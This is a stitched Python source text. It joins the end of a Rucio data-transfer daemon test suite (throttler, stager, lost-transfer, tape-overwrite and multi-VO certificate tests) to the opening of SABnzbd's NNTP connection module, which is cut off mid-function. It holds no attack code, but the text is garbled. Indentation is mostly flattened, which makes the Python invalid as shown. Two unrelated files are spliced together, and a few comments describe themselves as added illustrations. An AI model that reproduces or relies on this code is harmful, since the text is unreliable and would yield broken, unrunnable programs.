# Check metrics.
    # These gauge values are recorded at the beginning of the execution. Hence 2 waiting and 0 transfers
gauge_name = 'rucio_daemons_conveyor_throttler_set_rse_transfer_limits'
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'max_transfers'}) == 1
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'transfers'}) == 0
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'waiting'}) == 2
request1 = request_core.get_request_by_did(rse_id=dst_rse_id1, **did1)
request2 = request_core.get_request_by_did(rse_id=dst_rse_id1, **did2)
    # one request is WAITING and the other is QUEUED
assert (request1['state'] == RequestState.WAITING and request2['state'] == RequestState.QUEUED
or request1['state'] == RequestState.QUEUED and request2['state'] == RequestState.WAITING)
waiting_did = did1 if request1['state'] == RequestState.WAITING else did2
queued_did = did1 if request1['state'] == RequestState.QUEUED else did2
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Calling the throttler again will not schedule the waiting request, because there is a submitted one
throttler(once=True, partition_wait_time=None)
    # These gauge values are recorded at the beginning of the execution. Hence 1 waiting and 1 transfer
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'max_transfers'}) == 1
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'transfers'}) == 1
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'waiting'}) == 1
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **waiting_did)
assert request['state'] == RequestState.WAITING
request = __wait_for_request_state(dst_rse_id=dst_rse_id1, state=RequestState.DONE, **queued_did)
assert request['state'] == RequestState.DONE
request = __wait_for_request_state(dst_rse_id=dst_rse_id2, state=RequestState.DONE, **did1)
assert request['state'] == RequestState.DONE
# Now that the submitted transfers are finished, the WAITING one can be queued
throttler(once=True, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **waiting_did)
assert request['state'] == RequestState.QUEUED
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_non_deterministic_dst(did_factory, did_client, root_account, vo, caches_mock):
"""
Test a transfer towards a non-deterministic RSE
"""
src_rse = 'XRD3'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, dst_rse_id]
did = did_factory.upload_test_file(src_rse)
# Dataset name is part of the non-deterministic path
dataset = did_factory.make_dataset()
did_client.add_files_to_dataset(files=[{'scope': did['scope'].external, 'name': did['name']}], scope=dataset['scope'].external, name=dataset['name'])
rse_core.update_rse(rse_id=dst_rse_id, parameters={'deterministic': False})
try:
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
finally:
rse_core.update_rse(rse_id=dst_rse_id, parameters={'deterministic': True})
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs stager; poller and finisher")
def test_stager(rse_factory, did_factory, root_account, replica_client):
"""
    Submit a real stage-in request to FTS and rely on the gfal "mock" plugin to report a simulated "success"
https://gitlab.cern.ch/dmc/gfal2/-/blob/master/src/plugins/mock/README_PLUGIN_MOCK
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default', rse_type=RSEType.TAPE)
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id]
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
rse_core.add_rse_attribute(src_rse_id, 'staging_buffer', dst_rse)
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
did = did_factory.upload_test_file(src_rse)
replica = replica_core.get_replica(rse_id=src_rse_id, **did)
replica_client.add_replicas(rse=dst_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'state': 'C',
'bytes': replica['bytes'], 'adler32': replica['adler32'], 'md5': replica['md5']}])
request_core.queue_requests(requests=[{'dest_rse_id': dst_rse_id,
'scope': did['scope'],
'name': did['name'],
'rule_id': '00000000000000000000000000000000',
'attributes': {
'source_replica_expression': src_rse,
'activity': 'Some Activity',
'bytes': replica['bytes'],
'adler32': replica['adler32'],
'md5': replica['md5'],
},
'request_type': RequestType.STAGEIN,
'retry_count': 0,
'account': root_account,
'requested_at': datetime.now()}])
stager(once=True, rses=[{'id': rse_id} for rse_id in all_rses])
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, max_wait_seconds=2 * MAX_POLL_WAIT_SECONDS, **did)
assert replica['state'] == ReplicaState.AVAILABLE
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
def test_lost_transfers(rse_factory, did_factory, root_account):
"""
Correctly handle FTS "404 not found" errors.
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id]
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
did = did_factory.upload_test_file(src_rse)
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
@transactional_session
def __update_request(request_id, session=None, **kwargs):
session.query(models.Request).filter_by(id=request_id).update(kwargs, synchronize_session=False)
# Fake that the transfer is submitted and lost
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
__update_request(request['id'], external_id='some-fake-random-id')
# The request must be marked lost
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.LOST, **did)
assert request['state'] == RequestState.LOST
# Set update time far in the past to bypass protections (not resubmitting too fast).
# Run finisher and submitter, the request must be resubmitted and transferred correctly
__update_request(request['id'], updated_at=datetime.utcnow() - timedelta(days=1))
finisher(once=True, partition_wait_time=None)
# The source ranking must not be updated for submission failures and lost transfers
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
assert __get_source(request_id=request['id'], src_rse_id=src_rse_id, **did).ranking == 0
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
def test_cancel_rule(rse_factory, did_factory, root_account):
"""
Ensure that, when we cancel a rule, the request is cancelled in FTS
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id]
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
did = did_factory.upload_test_file(src_rse)
[rule_id] = rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
class _FTSWrapper(FTSWrapper):
@staticmethod
def on_submit(file):
            # Use the mock gfal plugin to simulate that copying the file takes a long time
file['sources'] = [set_query_parameters(s_url, {'time': 30}) for s_url in file['sources']]
with patch('rucio.daemons.conveyor.submitter.TRANSFERTOOL_CLASSES_BY_NAME') as tt_mock:
tt_mock.__getitem__.return_value = _FTSWrapper
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
rule_core.delete_rule(rule_id)
with pytest.raises(RequestNotFound):
request_core.get_request_by_did(rse_id=dst_rse_id, **did)
fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query(request['external_id'])
assert fts_response[request['external_id']][request['id']]['job_state'] == 'CANCELED'
class FTSWrapper(FTS3Transfertool):
"""
Used to alter the JSON exchange with FTS.
    One use-case is to use the "mock" gfal plugin (via a mock:// protocol/scheme) to simulate failures on the FTS side.
    For example, adding a size_pre=<something> url parameter makes "stat" calls on the FTS side return (i.e. simulate) this file size.
https://gitlab.cern.ch/dmc/gfal2/-/blob/master/src/plugins/mock/README_PLUGIN_MOCK
"""
@staticmethod
def on_submit(file):
pass
@staticmethod
def on_receive(job_response):
pass
@classmethod
def _FTS3Transfertool__file_from_transfer(cls, transfer, job_params):
file = super()._FTS3Transfertool__file_from_transfer(transfer, job_params)
cls.on_submit(file)
return file
def _FTS3Transfertool__bulk_query_responses(self, jobs_response):
self.on_receive(jobs_response)
return super()._FTS3Transfertool__bulk_query_responses(jobs_response)
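# A minimal illustrative sketch (not part of the original tests) of the "size_pre" use-case
# described in the FTSWrapper docstring above: the hypothetical subclass below would make the
# gfal mock plugin report a wrong source size on "stat", so FTS fails the transfer.
# The class name and the value 1234 are arbitrary and only for illustration.
class _SizePreFTSWrapperExample(FTSWrapper):
    @staticmethod
    def on_submit(file):
        # Append size_pre=<bytes> to every source URL handed to FTS
        file['sources'] = [set_query_parameters(s_url, {'size_pre': 1234}) for s_url in file['sources']]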
@pytest.fixture
def overwrite_on_tape_topology(rse_factory, did_factory, root_account, vo, file_factory):
"""
Prepares the XRD* RSEs for an overwrite_on_tape test.
    - fakes that one xroot RSE is a tape destination (and rolls back the change after the test)
    Return a factory which allows uploading/registering/adding a rule for two dids
"""
rse1 = 'XRD1'
rse1_id = rse_core.get_rse_id(rse=rse1, vo=vo)
rse2 = 'XRD3'
rse2_id = rse_core.get_rse_id(rse=rse2, vo=vo)
rse3 = 'XRD4'
rse3_id = rse_core.get_rse_id(rse=rse3, vo=vo)
def __generate_and_upload_file(src_rse, dst_rse, simulate_dst_corrupted=False):
"""
        Create and upload real files to both source and destination. Don't register the file on the destination; this way, FTS will fail if overwrite = False.
        If simulate_dst_corrupted is True, upload a different file to the destination to simulate that it is corrupted.
"""
local_file = file_factory.file_generator()
did = did_factory.random_did()
did_factory.upload_test_file(src_rse, path=local_file, **did)
did_factory.upload_client.upload(
[
{
'path': file_factory.file_generator(size=3) if simulate_dst_corrupted else local_file,
'rse': dst_rse,
'did_scope': did['scope'].external,
'did_name': did['name'],
'no_register': True,
}
]
)
return did
def __create_dids(did1_corrupted=True, did2_corrupted=True):
"""
Uploads two files:
        - one which requires multiple transfer hops to reach the destination
        - one which can be transferred in one hop to the destination RSE
"""
# multihop transfer:
did1 = __generate_and_upload_file(rse1, rse3, simulate_dst_corrupted=did1_corrupted)
# direct transfer
did2 = __generate_and_upload_file(rse2, rse3, simulate_dst_corrupted=did2_corrupted)
rule_core.add_rule(dids=[did1, did2], account=root_account, copies=1, rse_expression=rse3, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
return rse1_id, rse2_id, rse3_id, did1, did2
# Fake that destination RSE is a tape
rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.TAPE})
try:
rse_core.add_rse_attribute(rse3_id, 'archive_timeout', 60)
yield __create_dids
finally:
rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.DISK})
rse_core.del_rse_attribute(rse3_id, 'archive_timeout')
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True)
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by an expression
'rucio.core.config.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_overwrite_on_tape(overwrite_on_tape_topology, core_config_mock, caches_mock):
"""
Ensure that overwrite is not set for transfers towards TAPE RSEs
"""
rse1_id, rse2_id, rse3_id, did1, did2 = overwrite_on_tape_topology(did1_corrupted=False, did2_corrupted=True)
all_rses = [rse1_id, rse2_id, rse3_id]
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did1)
assert request['state'] == RequestState.FAILED
assert 'Destination file exists and overwrite is not enabled' in request['err_msg']
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did2)
assert request['state'] == RequestState.FAILED
assert 'Destination file exists and overwrite is not enabled' in request['err_msg']
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True)
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by an expression
'rucio.core.config.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_file_exists_handled(overwrite_on_tape_topology, core_config_mock, caches_mock):
"""
    If a transfer fails because the destination file already exists, and the size+checksums of that existing file
    are correct, the transfer must be marked successful.
"""
rse1_id, rse2_id, rse3_id, did1, did2 = overwrite_on_tape_topology(did1_corrupted=False, did2_corrupted=False)
all_rses = [rse1_id, rse2_id, rse3_id]
class _FTSWrapper(FTSWrapper):
@staticmethod
def on_receive(job_params):
for job in (job_params if isinstance(job_params, list) else [job_params]):
for file in job.get('files', []):
if (file.get('file_metadata', {}).get('dst_type') == 'TAPE'
and file.get('file_metadata', {}).get('dst_file', {}).get('file_on_tape') is not None):
# Fake that dst_file metadata contains file_on_tape == True
# As we don't really have tape RSEs in our tests, file_on_tape is always false
file['file_metadata']['dst_file']['file_on_tape'] = True
return job_params
with patch('rucio.core.transfer.FTS3Transfertool', _FTSWrapper):
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.DONE, **did1)
assert request['state'] == RequestState.DONE
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.DONE, **did2)
assert request['state'] == RequestState.DONE
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers; leaves pending fts transfers in archiving state")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
('transfers', 'overwrite_corrupted_files', False)
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by an expression
'rucio.core.config.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_overwrite_corrupted_files(overwrite_on_tape_topology, core_config_mock, caches_mock):
"""
If a transfer fails because the destination exists, and the size+checksums of the destination file are wrong,
    the next submission must be performed according to the overwrite_corrupted_files config parameter.
"""
rse1_id, rse2_id, rse3_id, did1, did2 = overwrite_on_tape_topology(did1_corrupted=True, did2_corrupted=True)
all_rses = [rse1_id, rse2_id, rse3_id]
class _FTSWrapper(FTSWrapper):
@staticmethod
def on_receive(job_params):
for job in (job_params if isinstance(job_params, list) else [job_params]):
for file in job.get('files', []):
if (file.get('file_metadata', {}).get('dst_type') == 'TAPE'
and file.get('file_metadata', {}).get('dst_file', {}).get('file_on_tape') is not None):
# Fake that dst_file metadata contains file_on_tape == True
# As we don't really have tape RSEs in our tests, file_on_tape is always false
file['file_metadata']['dst_file']['file_on_tape'] = True
return job_params
with patch('rucio.core.transfer.FTS3Transfertool', _FTSWrapper):
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Both transfers must be marked as failed because the file size is incorrect
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did1)
assert request['state'] == RequestState.FAILED
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did2)
assert request['state'] == RequestState.FAILED
# Re-submit the failed requests. They must fail again, because overwrite_corrupted_files is False
finisher(once=True, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=rse3_id, **did1)
assert request['state'] == RequestState.QUEUED
request = request_core.get_request_by_did(rse_id=rse3_id, **did2)
assert request['state'] == RequestState.QUEUED
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Set overwrite to True before running the poller or finisher
core_config.set('transfers', 'overwrite_corrupted_files', True)
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did1)
assert request['state'] == RequestState.FAILED
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did2)
assert request['state'] == RequestState.FAILED
# Re-submit one more time. Now the destination file must be overwritten
finisher(once=True, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=rse3_id, **did1)
assert request['state'] == RequestState.QUEUED
request = request_core.get_request_by_did(rse_id=rse3_id, **did2)
assert request['state'] == RequestState.QUEUED
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=rse3_id, **did1)
assert request['state'] == RequestState.SUBMITTED
assert __wait_for_fts_state(request, expected_state='ARCHIVING') == 'ARCHIVING'
request = request_core.get_request_by_did(rse_id=rse3_id, **did2)
assert request['state'] == RequestState.SUBMITTED
assert __wait_for_fts_state(request, expected_state='ARCHIVING') == 'ARCHIVING'
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("file_config_mock", [{"overrides": [
('conveyor', 'usercert', 'DEFAULT_DUMMY_CERT'),
('vo_certs', 'new', 'NEW_VO_DUMMY_CERT'),
]}], indirect=True)
def test_multi_vo_certificates(file_config_mock, rse_factory, did_factory, scope_factory, vo, second_vo):
"""
    Test that the submitter and poller call FTS with the correct certificates in a multi-VO environment
"""
_, [scope1, scope2] = scope_factory(vos=[vo, second_vo])
def __init_test_for_vo(vo, scope):
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default', vo=vo)
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default', vo=vo)
all_rses = [src_rse_id, dst_rse_id]
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
account = InternalAccount('root', vo=vo)
did = did_factory.random_did(scope=scope)
replica_core.add_replica(rse_id=src_rse_id, scope=scope, name=did['name'], bytes_=1, account=account, adler32=None, md5=None)
rule_core.add_rule(dids=[did], account=account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None,
lifetime=None, locked=False, subscription_id=None, ignore_account_limit=True)
return all_rses
all_rses = []
rses = __init_test_for_vo(vo=vo, scope=scope1)
all_rses.extend(rses)
rses = __init_test_for_vo(vo=second_vo, scope=scope2)
all_rses.extend(rses)
certs_used_by_submitter = []
certs_used_by_poller = []
class _FTSWrapper(FTS3Transfertool):
        # Override the FTS3 transfertool. Don't actually interact with FTS; just record the certificates used
def submit(self, transfers, job_params, timeout=None):
certs_used_by_submitter.append(self.cert[0])
return generate_uuid()
def bulk_query(self, transfer_ids, timeout=None):
certs_used_by_poller.append(self.cert[0])
return {}
with patch('rucio.daemons.conveyor.submitter.TRANSFERTOOL_CLASSES_BY_NAME') as tt_mock:
tt_mock.__getitem__.return_value = _FTSWrapper
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
assert sorted(certs_used_by_submitter) == ['DEFAULT_DUMMY_CERT', 'NEW_VO_DUMMY_CERT']
with patch('rucio.core.transfer.FTS3Transfertool', _FTSWrapper):
poller(once=True, older_than=0, partition_wait_time=None)
assert sorted(certs_used_by_poller) == ['DEFAULT_DUMMY_CERT', 'NEW_VO_DUMMY_CERT']
|
newswrapper.py
|
#!/usr/bin/python -OO
# Copyright 2008-2017 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.newswrapper
"""
import errno
import socket
from threading import Thread
from nntplib import NNTPPermanentError
import time
import logging
import re
import select
import sabnzbd
from sabnzbd.constants import *
import sabnzbd.cfg
import threading
_RLock = threading.RLock
del threading
# Import SSL if available
if sabnzbd.HAVE_SSL:
import ssl
if sabnzbd.HAVE_SSL_CONTEXT:
WantReadError = ssl.SSLWantReadError
CertificateError = ssl.CertificateError
else:
WantReadError = ssl.SSLError
CertificateError = ssl.SSLError
else:
# Dummy class so this exception is ignored by clients without ssl installed
class WantReadError(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class CertificateError(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
socket.setdefaulttimeout(DEF_TIMEOUT)
# getaddrinfo() can be very slow. In some situations this can lead
# to delayed starts and timeouts on connections.
# Because of this, the results will be cached in the server object.
def _retrieve_info(server):
""" Async attempt to run getaddrinfo() for specified server """
info = GetServerParms(server.host, server.port)
if info is None:
server.bad_cons += server.threads
else:
server.bad_cons = 0
(server.info, server.request) = (info, False)
sabnzbd.downloader.Downloader.do.wakeup()
def request_server_info(server):
""" Launch async request to resolve server address """
if not server.request:
server.request = True
Thread(target=_retrieve_info, args=(server,)).start()
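# Hedged usage sketch (not part of the original module): callers are expected to reuse the
# cached lookup stored on the server object and only fall back to the async request, e.g.
#
#     if server.info:
#         pass                            # reuse server.info for the new connection
#     else:
#         request_server_info(server)     # fills server.info in the background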
def GetServerParms(host, port):
""" Return processed getaddrinfo() for server """
try:
int(port)
except:
port = 119
opt = sabnzbd.cfg.ipv6_servers()
''' ... with the following meaning for 'opt':
Control the use of IPv6 Usenet server addresses. Meaning:
0 = don't use
1 = use when available and reachable (DEFAULT)
2 = force usage (when SABnzbd's detection fails)
'''
try:
# Standard IPV4 or IPV6
ips = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
# IPv6 forced by user, or IPv6 allowed and reachable, or IPv6 allowed and loadbalancing-with-IPv6 activated
# So return all IP addresses, no matter IPv4 or IPv6:
return ips
else:
# IPv6 unreachable or not allowed by user, so only return IPv4 address(es):
return [ip for ip in ips if ':' not in ip[4][0]]
except:
if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
try:
# Try IPV6 explicitly
return socket.getaddrinfo(host, port, socket.AF_INET6,
socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
except:
# Nothing found!
pass
return None
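# Illustrative summary (hypothetical addresses) of how 'opt' filters the result above:
#     IPv6 not selected or unreachable            -> only IPv4 entries, e.g. sockaddr ('203.0.113.10', 119)
#     opt == 2, or opt == 1 with IPv6 reachable
#     or IPv6 load-balancing enabled              -> all getaddrinfo() entries, IPv4 and IPv6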
def get_ssl_version(sock):
# Python <2.7.9 doesn't have SSLConnection.version()
try:
return sock.version()
except:
        # We can only give an estimate based on the cipher
return sock.cipher()[1]
def con(sock, host, port, sslenabled, write_fds, nntp):
if 0: assert isinstance(nntp, NNTP) # Assert only for debug purposes
try:
sock.connect((host, port))
sock.setblocking(0)
if sslenabled and sabnzbd.HAVE_SSL:
# Log SSL/TLS info
logging.info("%s@%s: Connected using %s (%s)",
nntp.nw.thrdnum, nntp.nw.server.host, get_ssl_version(sock), sock.cipher()[0])
nntp.nw.server.ssl_info = "%s (%s)" % (get_ssl_version(sock), sock.cipher()[0])
# Now it's safe to add the socket to the list of active sockets.
# 'write_fds' is an attribute of the Downloader singleton.
# This direct access is needed to prevent multi-threading sync problems.
if write_fds is not None:
write_fds[sock.fileno()] = nntp.nw
except (ssl.SSLError, CertificateError) as e:
nntp.error(e)
except socket.error, e:
try:
# socket.error can either return a string or a tuple
if isinstance(e, tuple):
(_errno, strerror) = e
else:
# Are we safe to hardcode the ETIMEDOUT error?
(_errno, strerror) = (errno.ETIMEDOUT, str(e))
e = (_errno, strerror)
# expected, do nothing
if _errno == errno.EINPROGRESS:
pass
finally:
nntp.error(e)
def probablyipv4(ip):
if ip.count('.') == 3 and re.sub('[0123456789.]', '', ip) == '':
return True
else:
return False
def probablyipv6(ip):
if ip.count(':') >= 2 and re.sub('[0123456789abcdefABCDEF:]', '', ip) == '':
return True
else:
return False
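# Quick sanity examples for the two helpers above (comments only, not executed):
#     probablyipv4('192.168.0.1')  -> True
#     probablyipv4('example.com')  -> False
#     probablyipv6('fe80::1')      -> True
#     probablyipv6('192.168.0.1')  -> False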
class NNTP(object):
def __init__(self, host, port, info, sslenabled, send_group, nw, user=None, password=None, block=False, write_fds=None):
if 0: assert isinstance(nw, NewsWrapper) # Assert only for debug purposes
self.host = host
self.port = port
self.nw = nw
self.blocking = block
self.error_msg = None
if not info:
if block:
info = GetServerParms(host, port)
else:
raise socket.error(errno.EADDRNOTAVAIL, "Address not available - Check for internet or DNS problems")
af, socktype, proto, canonname, sa = info[0]
        # there will be a connect to host (or self.host), so force 'af' to the correct value
if probablyipv4(host):
af = socket.AF_INET
if probablyipv6(host):
af = socket.AF_INET6
if sslenabled and sabnzbd.HAVE_SSL:
# Use context or just wrapper
if sabnzbd.HAVE_SSL_CONTEXT:
# Setup the SSL socket
ctx = ssl.create_default_context()
# Only verify hostname when we're strict
if(nw.server.ssl_verify < 2):
ctx.check_hostname = False
# Certificates optional
if(nw.server.ssl_verify == 0):
ctx.verify_mode = ssl.CERT_NONE
# Did the user set a custom cipher-string?
if(sabnzbd.cfg.ssl_ciphers()):
# At their own risk, socket will error out in case it was invalid
ctx.set_ciphers(sabnzbd.cfg.ssl_ciphers())
self.sock = ctx.wrap_socket(socket.socket(af, socktype, proto), server_hostname=str(nw.server.host))
else:
# Ciphers have to be None, if set to empty-string it will fail on <2.7.9
ciphers = sabnzbd.cfg.ssl_ciphers() if sabnzbd.cfg.ssl_ciphers() else None
# Use a regular wrapper, no certificate validation
self.sock = ssl.wrap_socket(socket.socket(af, socktype, proto), ciphers=ciphers)
elif sslenabled and not sabnzbd.HAVE_SSL:
logging.error(T('Error importing OpenSSL module. Connecting with NON-SSL'))
self.sock = socket.socket(af, socktype, proto)
else:
self.sock = socket.socket(af, socktype, proto)
try:
            # Open the connection in a separate thread to avoid blocking
# For server-testing we do want blocking
if not block:
Thread(target=con, args=(self.sock, self.host, self.port, sslenabled, write_fds, self)).start()
else:
                # if blocking (server test), only wait 4 seconds during connect before timing out
self.sock.settimeout(4)
self.sock.connect((self.host, self.port))
if sslenabled and sabnzbd.HAVE_SSL:
# Log SSL/TLS info
logging.info("%s@%s: Connected using %s (%s)",
self.nw.thrdnum, self.nw.server.host, get_ssl_version(self.sock), self.sock.cipher()[0])
self.nw.server.ssl_info = "%s (%s)" % (get_ssl_version(self.sock), self.sock.cipher()[0])
except (ssl.SSLError, CertificateError) as e:
self.error(e)
except socket.error, e:
try:
# socket.error can either return a string or a tuple
if isinstance(e, tuple):
(_errno, strerror) = e
else:
# Are we safe to hardcode the ETIMEDOUT error?
(_errno, strerror) = (errno.ETIMEDOUT, str(e))
e = (_errno, strerror)
# expected, do nothing
if _errno == errno.EINPROGRESS:
pass
finally:
self.error(e)
def error(self, error):
if 'SSL23_GET_SERVER_HELLO' in str(error) or 'SSL3_GET_RECORD' in str(error):
